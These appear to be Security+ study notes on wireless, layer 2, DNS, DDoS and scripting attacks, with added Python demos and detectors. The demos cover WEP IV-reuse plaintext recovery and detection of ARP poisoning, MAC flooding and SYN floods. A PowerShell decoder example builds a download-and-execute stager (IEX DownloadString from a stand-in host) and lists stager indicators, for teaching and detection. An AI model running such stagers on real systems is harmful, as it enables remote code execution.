Uploaded by Ken Eromosele

Wireless
Wireless network attacks attempt to take advantage of vulnerabilities in wireless
protocols as well as interfere with the wireless network or create false wireless access
points to gain entry to a network or steal information.
evil twin—An evil twin is an attacker-controlled access point (AP) set up to look like a
legitimate one. It usually broadcasts the same SSID (and often the same security type) as
the real AP but with a stronger signal; because clients prefer the strongest signal for a
known network, targets join the attacker's AP and their traffic passes through it.
rogue access point—A rogue access point is any AP attached to or advertising a network
without the network owner's authorization, such as a consumer router an employee plugs
into an office port or a phone hotspot bridged to the LAN. For example, if you are in a
coffee shop and attempt to connect to the shop's wireless network, you may see numerous
networks being broadcast from various devices within the shop alongside the legitimate
coffee shop Wi-Fi AP; any of those could be a rogue AP, and an evil twin is a rogue AP
that deliberately mimics the legitimate one.
bluesnarfing—Bluesnarfing is a Bluetooth attack that gains unauthorized access to a
device via the Bluetooth connection. Bluesnarfing attacks are intended for the
exfiltration of information such as credentials.
bluejacking—Bluejacking is a Bluetooth attack that sends unsolicited messages to a
target device via a Bluetooth connection.
disassociation—Disassociation occurs when a device is disconnected from an AP. In
802.11 without protected management frames (802.11w), deauthentication and
disassociation frames are not authenticated, so an attacker can spoof them from the AP's
MAC address and force a target off the network, then trick the target into reconnecting
through an illegitimate connection such as a rogue access point or evil twin. The same
technique is used to capture the WPA2 four-way handshake when the client rejoins.
jamming—Jamming is an attack that blocks traffic from communicating in a targeted
frequency or range.
radio frequency identification (RFID)—RFID is a short-range wireless technology that
uses radio frequencies to communicate information between a tag and a reader. A passive
tag has no power source of its own; it is energized by the reader's field and answers by
returning its stored identifier, so the reader pulls information from the tag rather than
the tag initiating communication. Attackers can take advantage of RFID communication by
cloning, spoofing, or modifying tags, or by impersonating RFID readers to harvest tag
data from a distance.
near-field communication (NFC)—NFC is a short-range wireless technology, typically
around 4 centimeters (an inch or two) in range, that allows small amounts of information
to pass between devices. NFC chips are used in contactless payment systems and access
badges. NFC can be vulnerable to spoofing, interception (eavesdropping or relay), and
replay attacks.
initialization Vector (IV)—The IV is a per-message value combined with the key so that
encrypting the same data twice does not produce the same output; it should be unique for
every message and, for most modes, unpredictable. IV attacks do not "decipher" the IV
(it is sent in the clear) but exploit IVs that are too short, predictable, or reused,
which causes keystream reuse and leaks plaintext or the key itself. The original wireless
security protocol, WEP, used a 24-bit IV prepended to the shared key as the RC4 key, so
IVs repeat on a busy network within hours and the key can be recovered from captured
frames; only such insecure protocols remain susceptible to IV attacks.
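The following is an added example, not code from the original notes: it shows concretely why a reused IV breaks a stream cipher such as WEP's RC4. Two frames encrypted under the same IV and key share a keystream, so XORing the ciphertexts cancels the keystream and a known first plaintext reveals the second. The key, IV and frame payloads are constructed sample values.

```python
# Added example (not from the original notes): IV reuse in a WEP-style stream cipher.
# WEP keys RC4 with IV || shared_key; a repeated 24-bit IV means a repeated keystream.
# Key, IV and plaintexts below are constructed sample values.

def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream generator (KSA + PRGA); WEP uses RC4, so it is modelled here."""
    s = list(range(256))
    j = 0
    for i in range(256):                        # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                     # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(iv: bytes, key: bytes, data: bytes) -> bytes:
    """WEP-style encryption: per-packet RC4 key is the 3-byte IV prepended to the shared key.
    Decryption is the same operation because XOR is its own inverse."""
    stream = rc4(iv + key, len(data))
    return bytes(p ^ k for p, k in zip(data, stream))

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def recover_with_known_plaintext(ct1: bytes, ct2: bytes, known_pt1: bytes) -> bytes:
    """When two ciphertexts share an IV (hence a keystream), C1 XOR C2 == P1 XOR P2.
    Knowing P1 (e.g. a predictable protocol header) yields P2 without the key."""
    return xor(xor(ct1, ct2), known_pt1)

def iv_space_size(bits: int = 24) -> int:
    """Distinct IVs available; 2^24 is small enough to wrap in hours on a busy AP."""
    return 1 << bits

if __name__ == "__main__":
    key = b"\x01\x23\x45\x67\x89"            # constructed 40-bit WEP key
    iv = b"\x00\x00\x01"                    # constructed IV the AP reuses
    p1 = b"GET /index.html HTTP/1.1"        # constructed frame payloads
    p2 = b"user=alice&pass=s3cretpw"
    c1 = wep_encrypt(iv, key, p1)
    c2 = wep_encrypt(iv, key, p2)
    print(recover_with_known_plaintext(c1, c2, p1))   # the second plaintext, no key needed
    print(iv_space_size())                            # 16777216
```

The recovery step needs only the two captured ciphertexts and a guess at one plaintext; real WEP tools also use the fact that the first keystream bytes are statistically biased when the key starts with a known IV, which is why key recovery, not just plaintext recovery, is possible.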
On-Path Attack
An on-path attack is an attack in which the attacker places themselves between two hosts
and intercepts traffic as it is sent from one to the other. This was formerly known as
(and is often still referred to as) a man-in-the-middle attack. Intercepted packets can be
read, altered, delayed, or blocked by the interceptor; the victims believe they are
talking directly to each other.
Layer 2 Attacks
Layer 2 in the OSI model is the data link layer, responsible for delivering frames between
adjacent network nodes. Layer 2 attacks target frames in transit between those nodes and
the tables (ARP caches, switch CAM tables) that decide where frames go. Because frames
do not cross routers, local access to the network segment is required to attack the data
link layer.
address resolution protocol (ARP) poisoning—ARP poisoning occurs when an attacker sends
forged ARP replies (often unsolicited "gratuitous" replies) to hosts and/or the default
gateway, claiming that the attacker's MAC address belongs to another device's IP address.
ARP has no authentication, so the victims update the IP/MAC pairings in their ARP caches
and send traffic for that IP to the attacker, enabling an on-path attack.
media access control (MAC) flooding—MAC flooding occurs when an attacker sends frames
from a large number of bogus source MAC addresses to a switch, filling its CAM (MAC
address) table. When the table is full, the switch can no longer learn which port a
destination lives on and by default fails open, flooding unicast frames out every port
like a hub, so the attacker can sniff traffic for other hosts. Port security (limiting
the MAC addresses learned per port) is the usual countermeasure.
MAC cloning—MAC cloning is the duplication of a MAC address. A cloned MAC address
can be used to access unauthorized networks or communication streams by imitating a
trusted MAC address.
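The following is an added example, not code from the original notes: a passive layer 2 monitor that applies two detections to a constructed frame log, one for ARP poisoning (a second MAC starts answering for an IP already bound to another MAC) and one for MAC flooding (a single switch port sources far more MAC addresses than a real host would, the same limit port security enforces). The frame records, MAC addresses, port names and the per-port threshold are all constructed assumptions.

```python
# Added example (not from the original notes): layer 2 detections over a constructed
# frame log. Frame records, addresses and thresholds are constructed assumptions.
from collections import defaultdict

# Constructed records: (switch_port, src_mac, arp_op, arp_sender_ip, arp_sender_mac).
# arp_op is "reply", "request", or None for non-ARP frames.
FRAMES = [
    ("g0/1", "aa:aa:aa:00:00:01", "reply",   "10.0.0.1", "aa:aa:aa:00:00:01"),  # real gateway
    ("g0/2", "aa:aa:aa:00:00:02", "request", "10.0.0.2", "aa:aa:aa:00:00:02"),  # real host
    ("g0/3", "de:ad:be:ef:00:03", "reply",   "10.0.0.1", "de:ad:be:ef:00:03"),  # claims gateway IP
    ("g0/3", "de:ad:be:ef:00:03", "reply",   "10.0.0.2", "de:ad:be:ef:00:03"),  # claims host IP
] + [
    # MAC flood: 300 frames from distinct bogus source MACs on one port
    ("g0/4", f"02:00:00:00:{n >> 8:02x}:{n & 0xff:02x}", None, None, None)
    for n in range(300)
]

def detect_arp_poisoning(frames):
    """Return (ip, first_seen_mac, conflicting_mac) for each ARP frame whose sender
    pair rebinds an IP already seen with a different MAC. Requests are learned too,
    because many stacks refresh existing cache entries from them."""
    bindings = {}
    alerts = []
    for _port, _src, op, ip, mac in frames:
        if op is None:
            continue
        if ip in bindings and bindings[ip] != mac:
            alerts.append((ip, bindings[ip], mac))
        bindings.setdefault(ip, mac)   # first-seen binding is treated as the trusted one
    return alerts

def detect_mac_flooding(frames, max_macs_per_port=8):
    """Return {port: distinct_src_mac_count} for ports exceeding a per-port MAC budget.
    A CAM table fills by exactly this pattern, and port security uses the same limit."""
    seen = defaultdict(set)
    for port, src, *_ in frames:
        seen[port].add(src)
    return {p: len(m) for p, m in seen.items() if len(m) > max_macs_per_port}

if __name__ == "__main__":
    print(detect_arp_poisoning(FRAMES))   # two rebinding alerts from port g0/3's MAC
    print(detect_mac_flooding(FRAMES))    # {'g0/4': 300}
```

On real switches the equivalent controls are Dynamic ARP Inspection (validates ARP against the DHCP snooping binding table) and port security; this monitor shows the logic those features implement.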
Domain Name System (DNS)
DNS is the internet protocol that translates domain names into their corresponding IP
addresses. For example, when you type a URL into a browser, you type its domain name,
such as www.google.com. The system sends that name to a DNS resolver (for instance
Google's public resolver at 8.8.8.8, or the one your ISP or company provides), which looks
up www.google.com, returns the IP address that the name currently maps to, and the
browser then connects to that address.
domain hijacking—Domain hijacking changes the registration/ownership of a domain.
DNS poisoning—DNS poisoning can occur in two ways, either through an on-path attack or
through direct poisoning of a resolver's cache. With a DNS on-path poisoning attack, the
DNS request or response is intercepted and a false answer is returned, redirecting the
victim to a malicious site. A DNS cache poisoning attack is similar to ARP cache
poisoning: forged responses are injected so that the cache holding DNS records is
tainted, and every client of that resolver then receives the false answer until the record
expires. Randomized transaction IDs and source ports, and DNSSEC, are the main defenses.
Uniform Resource Locator (URL) redirection—URL redirection sends the user to a
destination other than the one the URL implies. In this context it most commonly occurs
when alternate IP addresses for hostnames are entered into a system's hosts file, which
is consulted before DNS; poisoned DNS answers and unvalidated redirect parameters in web
applications (open redirects) achieve the same effect.
domain reputation—Domain reputation is the legitimacy, health, and security of a
domain based on information from ISP and email providers. Domain reputation
services provide this information on most domains.
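The following is an added example, not code from the original notes: a simplified model of the checks a caching resolver applies before trusting a DNS response, which is what makes blind cache poisoning hard. A forged answer must match the transaction ID, the randomized source port and the question of an outstanding query, and may only contribute records for names inside the zone that was queried (the "bailiwick" rule). The class, its method names, the zone heuristic and the IP addresses (documentation ranges) are constructed assumptions, not any real resolver's code.

```python
# Added example (not from the original notes): resolver-side checks against DNS cache
# poisoning. Class, method names, zone heuristic and addresses are constructed assumptions.
import secrets

class ResolverCache:
    def __init__(self):
        self.pending = {}   # txid -> (source_port, qname) for queries awaiting an answer
        self.cache = {}     # name -> ip

    def send_query(self, qname):
        """Send a query with a random 16-bit TXID and a random source port, so a blind
        attacker must guess roughly 32 bits to have a forged reply accepted."""
        txid = secrets.randbelow(1 << 16)
        port = 1024 + secrets.randbelow(64512)
        self.pending[txid] = (port, qname)
        return txid, port

    @staticmethod
    def in_bailiwick(name, qname):
        """Assumption: treat the parent of the queried name as the zone; a response to
        www.example.com may carry example.com records, never www.bank.com."""
        zone = qname.split(".", 1)[1]
        return name == zone or name.endswith("." + zone)

    def accept_response(self, txid, dst_port, qname, answers):
        """Cache the answers only if the response matches a pending query exactly and
        every record is in-bailiwick; otherwise drop it and return False."""
        if txid not in self.pending:
            return False                          # no such outstanding query (or already answered)
        port, expected = self.pending[txid]
        if dst_port != port or qname != expected:
            return False                          # wrong port or question: spoofed
        if any(not self.in_bailiwick(name, qname) for name, _ in answers):
            return False                          # attempt to plant records for another zone
        del self.pending[txid]                    # first valid answer wins; later ones are ignored
        self.cache.update(answers)
        return True

if __name__ == "__main__":
    r = ResolverCache()
    txid, port = r.send_query("www.example.com")
    # Blind attacker guesses a TXID without seeing the query: rejected.
    print(r.accept_response((txid + 1) % 65536, port, "www.example.com", [("www.example.com", "203.0.113.5")]))
    # Attacker on the path with the right TXID/port but smuggling a foreign record: rejected.
    print(r.accept_response(txid, port, "www.example.com", [("www.example.com", "192.0.2.10"), ("www.bank.com", "203.0.113.5")]))
    # Legitimate response: accepted and cached.
    print(r.accept_response(txid, port, "www.example.com", [("www.example.com", "192.0.2.10")]), r.cache)
```

The bailiwick check is what stops the classic "answer for the victim, but slip in a glue record for a name you want to hijack" variant; the port randomization is why an attacker needs billions of guesses rather than 65,536.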
Distributed Denial-of-Service (DDoS)
A DDoS attack is a form of DoS attack that originates from multiple locations, networks,
and systems. DDoS attacks are difficult to stop due to their distributed nature and are
used to overwhelm or incapacitate a target system.
network—A network DDoS attack is the most common type of DDoS attack and is aimed at
disrupting an entire target network or the bandwidth and devices in front of it. Network
DDoS attacks are either volume based or protocol based. A volume-based DDoS attack
attempts to disrupt the target through the sheer volume of traffic sent at once,
exhausting link bandwidth; common volume-based attacks are UDP and ICMP floods, often
amplified through reflectors such as open DNS or NTP servers. A protocol-based DDoS
attack targets the underlying protocols and the state that network devices and servers
must keep; the most common protocol-based attack is the SYN flood, which leaves the
target holding many half-open TCP connections.
application—An application DDoS attack targets the application layer.
operational technology (OT)—OT is the software and hardware that is used to control
devices and systems in buildings, factories, and other industries. An OT DDoS attack
uses the same methods as network and application DDoS attacks but specifically
targets OT. OT, for the purposes of the Security+ exam, includes internet of things (IoT)
devices.
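The following is an added example, not code from the original notes: a detector for the protocol-based attack named above (the SYN flood), run over a constructed packet log. The signature is a high count of SYN packets toward a service with very few handshakes completed, in contrast to the one-SYN-one-ACK pattern of real clients. The records, addresses and thresholds are constructed assumptions.

```python
# Added example (not from the original notes): SYN flood detection over a constructed
# packet log. Records, addresses and thresholds are constructed assumptions.
from collections import Counter

TARGET = ("203.0.113.10", 443)

# Constructed records: (src_ip, dst_ip, dst_port, tcp_flag) where "S" is a SYN and
# "A" is the ACK that completes the three-way handshake.
PACKETS = []
for i in range(1, 6):                                        # five real clients, each completes
    PACKETS.append((f"10.1.1.{i}", *TARGET, "S"))
    PACKETS.append((f"10.1.1.{i}", *TARGET, "A"))
PACKETS += [(f"198.51.100.{n % 250 + 1}", *TARGET, "S")      # 500 spoofed-source SYNs, no ACKs
            for n in range(500)]

def handshake_stats(packets, dst_ip, dst_port):
    """Return (syn_count, ack_count, completion_ratio) for one listening service."""
    syns = sum(1 for s, d, p, f in packets if (d, p, f) == (dst_ip, dst_port, "S"))
    acks = sum(1 for s, d, p, f in packets if (d, p, f) == (dst_ip, dst_port, "A"))
    return syns, acks, (acks / syns if syns else 1.0)

def detect_syn_flood(packets, dst_ip, dst_port, min_syns=100, min_completion=0.5):
    """Flag a flood when many SYNs arrive and most never complete a handshake.
    Both thresholds are assumptions to be tuned to the service's normal traffic."""
    syns, _acks, completion = handshake_stats(packets, dst_ip, dst_port)
    return syns >= min_syns and completion < min_completion

def top_syn_sources(packets, dst_ip, dst_port, n=3):
    """Sources sending the most SYNs; in a spoofed flood these are scattered, which is
    itself a hint that per-source rate limiting will not help and SYN cookies will."""
    c = Counter(s for s, d, p, f in packets if (d, p, f) == (dst_ip, dst_port, "S"))
    return c.most_common(n)

if __name__ == "__main__":
    print(handshake_stats(PACKETS, *TARGET))     # (505, 5, ~0.0099)
    print(detect_syn_flood(PACKETS, *TARGET))    # True
    print(top_syn_sources(PACKETS, *TARGET))
```

The same completion-ratio logic is what a host applies when it enables SYN cookies: stop allocating half-open state when the backlog of unanswered SYNs grows, so the attack costs the target nothing more than bandwidth.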
Malicious Code or Script Execution
Malicious code is code inserted into or run on a system for malicious purposes. Like
malware, it is designed to disrupt systems, steal data, or intercept communications; the
difference is that it is often not a separate program but a script run by an interpreter
already on the host. Malicious code therefore frequently abuses built-in tools, scripting
languages, and protocols (so-called living-off-the-land techniques) to gain leverage over
a system or network while blending in with legitimate administration.
Test Note: You should be able to differentiate between basic coding samples.
PowerShell—PowerShell is Microsoft's scripting language and shell, built into Windows.
Indicators of PowerShell code are the PS> prompt, $-prefixed variables, and Verb-Noun
cmdlets such as Write-Host; the ";" separates statements on one line, though, as the
second example shows, a ";" inside a quoted string is just text.
PS> $x="Message1" ; Write-Host $x
Message1
PS> $x="Message1;Write-Host Busted" ; Write-Host $x
Message1;Write-Host Busted
Python—Python is a popular coding language with readable, English-like syntax.
Python uses indentation rather than { } as block delimiters and rarely uses ";". The
example below (Python 3; requires the third-party python-whois package) prompts for a
domain and prints its WHOIS record.
import whois  # third-party package: pip install python-whois
data = input("Enter a domain: ")  # read the domain name to look up
w = whois.whois(data)  # query WHOIS for the registration record
print(w)
Bash—Bash, which stands for Bourne Again Shell, is an interpreter that processes shell
commands. Indicators are "#!/bin/bash", $variables, $(...) command substitution and
functions declared as name () { ... }. The excerpt below draws a text progress bar.
progressBarWidth=20
taskCount=10; tasksDone=4   # sample values so the function has inputs
# Function to draw progress bar
progressBar () {
  # Calculate number of fill/empty slots in the bar
  progress=$(echo "$progressBarWidth/$taskCount*$tasksDone" | bc -l)
  fill=$(printf '%.0f' "$progress")   # round to a whole number of slots
  printf '[%-*s]\n' "$progressBarWidth" "$(printf '%*s' "$fill" '' | tr ' ' '#')"
}
progressBar
macros—Macros are abbreviations of complicated inputs to a computer program and
can be used to reuse code. Macros can be tainted with malicious code and must be
used carefully.
Visual Basic for Applications (VBA)—VBA is an event-driven scripting language mainly
used by Microsoft for its Office applications. Indicators are Sub ... End Sub blocks,
comment lines beginning with an apostrophe, and object calls such as Range and
ActiveCell. A recorded Excel macro looks like this:
Sub Macro1()
'
' Macro1 Macro
'
    Range("B1").Select
    ActiveCell.FormulaR1C1 = "Hello World"
    Range("B2").Select
End Sub
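The following is an added example, not code from the original notes, and it goes beyond identifying a language: when malicious PowerShell is launched it is usually passed as an -EncodedCommand argument, a base64 string of UTF-16LE text, so nothing recognizable appears in the process command line. The function below decodes such a command line and flags cmdlets and switches typical of download-and-execute stagers. The sample command line is constructed inside the block; the indicator list and function names are assumptions.

```python
# Added example (not from the original notes): decode PowerShell -EncodedCommand
# arguments and flag stager indicators. Sample command line and indicator list are
# constructed assumptions.
import base64
import binascii
import re
from typing import Optional

# Strings commonly seen in download-and-execute one-liners (assumed list).
INDICATORS = ["Invoke-Expression", "IEX", "DownloadString", "Net.WebClient",
              "FromBase64String", "-nop", "-w hidden"]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
# -ex (ExecutionPolicy) and -ep are excluded so their values are not mistaken for base64.
ENC_ARG = re.compile(r"-e(?![xp])[a-z]*\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None   # looked like -enc but the payload is not valid UTF-16LE base64

def analyze(cmdline: str) -> dict:
    """Decode the command line and list indicators found in it or in the decoded script."""
    decoded = decode_encoded_command(cmdline)
    haystack = (cmdline + "\n" + (decoded or "")).lower()
    return {"decoded": decoded,
            "indicators": [s for s in INDICATORS if s.lower() in haystack]}

def build_sample() -> str:
    """Constructed sample: a stager hidden behind -enc, as a process-creation log would show it."""
    script = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
    b64 = base64.b64encode(script.encode("utf-16-le")).decode()
    return "powershell.exe -nop -w hidden -enc " + b64

if __name__ == "__main__":
    result = analyze(build_sample())
    print(result["decoded"])
    print(result["indicators"])
```

In a SIEM this runs over process-creation events (Sysmon Event ID 1 or Security 4688 with command-line logging enabled); PowerShell script block logging (Event ID 4104) records the decoded script directly and is the more reliable source when it is turned on.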